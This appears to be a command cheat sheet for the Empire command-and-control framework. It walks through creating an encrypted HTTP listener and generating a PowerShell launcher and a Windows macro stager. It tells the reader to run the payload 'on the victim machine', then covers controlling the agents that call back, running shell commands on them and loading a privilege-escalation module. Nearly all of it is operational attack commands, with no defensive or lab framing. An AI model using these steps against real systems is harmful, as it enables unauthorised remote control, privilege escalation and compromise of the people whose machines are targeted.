Empire

Basic command

To get back to the home menu:

main

Listener

Use the listeners module:

listeners

For example, to create an HTTP listener:

uselistener http

It is always recommended to encrypt our traffic! To do so, run the cert script:

$Empire/setup/cert.sh

A pem file and a private key file will be generated in the $Empire/data/ folder.

Then, in the listener configuration, apply the cert:

set CertPath $Empire/data

Then execute!

execute

To view active listeners:

listeners

Stager

To start with:

usestager

multi/launcher

For example, use multi/launcher:

usestager multi/launcher

To see the options:

info

We have to specify our listener type:

set listener http

Execute!

execute

After this, a PowerShell script will be generated. Go on and execute this script on the victim machine.

windows/macro

usestager windows/macro
set listener http
set outfile $Empire/data/macro
execute

C2

After the agent calls back, see the agent using:

agents

To interact with the agent:

interact <AGENT_NAME>

To view the agent information:

info

To run a shell command:

shell <command>

Modules

To search for modules, simply:

searchmodule <keyword>

For example, to use PowerUp AllChecks:

usemodule privesc/powerup/allchecks
